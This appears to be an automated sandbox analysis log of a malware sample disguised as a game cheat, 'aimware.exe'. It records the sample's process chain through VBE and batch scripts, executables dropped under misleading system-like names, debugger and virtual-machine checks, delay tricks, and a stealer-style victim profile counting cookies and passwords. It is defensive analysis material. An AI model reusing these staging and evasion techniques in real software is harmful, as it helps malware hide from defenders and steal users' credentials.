Source: C:\Recovery\spoolsv.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Recovery\spoolsv.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\spoolsv.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\spoolsv.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\aimware.exe	Code function: 0_2_00ABA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,		0_2_00ABA69B
Source: C:\Users\user\Desktop\aimware.exe	Code function: 0_2_00ACC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,		0_2_00ACC220

Source: C:\Users\user\Desktop\aimware.exe

Code function: 0_2_00ACE6A3 VirtualQuery,GetSystemInfo,

0_2_00ACE6A3

Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\spoolsv.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\spoolsv.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 30000
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 600000
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 599684
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 599296
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 599150
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 598953
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 598578
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 598234
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 597875
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 597558
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 3600000
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 597421
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 597281
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 597155
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 597046
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 596906
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 596796
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 596656
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 596545
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 596436
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 596202
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 596038
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 595921
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 595803
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 595685
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 595440
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 594968
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 594671
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 594541
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 300000
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 594437
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 594210
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 594093
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 593938
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 593827
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 593718
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 593609
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 593499
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 593366
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 593250
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 593137
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 593030
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 592908
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 592781
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 592661
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 592526
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 592248
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 592065
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 591603
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 591343
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 591140
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 590999
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 590880
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 590748
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 590640
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 590505
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 590375
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 590265
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 590156
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 590046
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 589937
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 589828
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 589713
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 589599
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 588690
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 588562
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 588385
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Thread delayed: delay time: 922337203685477
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Thread delayed: delay time: 922337203685477
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\spoolsv.exe	Thread delayed: delay time: 922337203685477
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\spoolsv.exe	Thread delayed: delay time: 922337203685477

Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2938650074.0000000013083000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: eEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
Source: wscript.exe, 00000001.00000003.1726272088.0000000002C6B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: SurrogatesessionRuntimeBrokerDhcp.exe, 00000004.00000002.1788661906.000000001BC0B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\6
Source: wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2907041751.00000000013B3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: w32tm.exe, 00000021.00000002.1830887633.000001E072F97000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll$

Source: C:\Users\user\Desktop\aimware.exe

API call chain: ExitProcess graph end node

graph_0-23929

Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\aimware.exe

Code function: 0_2_00ACF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00ACF838

Source: C:\Users\user\Desktop\aimware.exe

Code function: 0_2_00AD7DEE mov eax, dword ptr fs:[00000030h]

0_2_00AD7DEE

Source: C:\Users\user\Desktop\aimware.exe

Code function: 0_2_00ADC030 GetProcessHeap,

0_2_00ADC030

Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Recovery\spoolsv.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Recovery\spoolsv.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Process token adjusted: Debug
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process token adjusted: Debug
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process token adjusted: Debug
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\aimware.exe	Code function: 0_2_00ACF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00ACF838
Source: C:\Users\user\Desktop\aimware.exe	Code function: 0_2_00ACF9D5 SetUnhandledExceptionFilter,	0_2_00ACF9D5
Source: C:\Users\user\Desktop\aimware.exe	Code function: 0_2_00ACFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00ACFBCA
Source: C:\Users\user\Desktop\aimware.exe	Code function: 0_2_00AD8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00AD8EBD

Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\aimware.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\webFontsession\ygBm0L4dnhMtPJ5zo9k2Iwhn4.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\webFontsession\7uhC6Mx3YQJtIYicktXEMaD7UeOIzINRTf.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe "C:\webFontsession/SurrogatesessionRuntimeBrokerDhcp.exe"	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dvzhjsuk\dvzhjsuk.cmdline"	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\n17UfJYjYj.bat"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7247.tmp" "c:\Windows\System32\CSCF3A8C87A1D90404F9DF2BA668ED638.TMP"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe "C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe"

Source: wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2912163322.0000000003702000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerH
Source: wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2912163322.0000000003249000.00000004.00000800.00020000.00000000.sdmp, wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2912163322.000000000332A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2912163322.0000000003702000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: .1",5,1,"","user","936905","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Program Files (x86)\\windows photo viewer","Unknown (Unknown)","Unknown (Unknown)","Program Manager","8.46.123.189","US / United States of America","New York / New York City"," / "
Source: wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2912163322.0000000003702000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: [{"Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N","Cookies Count (1671)":"25","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"?"},"5.0.1",5,1,"","user","936905","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Program Files (x86)\\windows photo viewer","Unknown (Unknown)","Unknown (Unknown)","Program Manager","8.46.123.189","US / United States of America","New York / New York City"," / "]
Source: wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2912163322.0000000003702000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: [{"Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N","Cookies Count (1671)":"25","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"?"},"5.0.1",5,1,"","user","936905","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Program Files (x86)\\windows photo viewer","Unknown (Unknown)","Unknown (Unknown)","Program Manager","8.46.123.189","US / United States of America","New York / New
Source: wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2912163322.0000000003702000.00000004.00000800.00020000.00000000.sdmp, wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2912163322.000000000332A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager8S

Source: C:\Users\user\Desktop\aimware.exe

Code function: 0_2_00ACF654 cpuid

0_2_00ACF654

Source: C:\Users\user\Desktop\aimware.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_00ACAF0F

Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Queries volume information: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe VolumeInformation	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Recovery\spoolsv.exe	Queries volume information: C:\Recovery\spoolsv.exe VolumeInformation	Jump to behavior
Source: C:\Recovery\spoolsv.exe	Queries volume information: C:\Recovery\spoolsv.exe VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
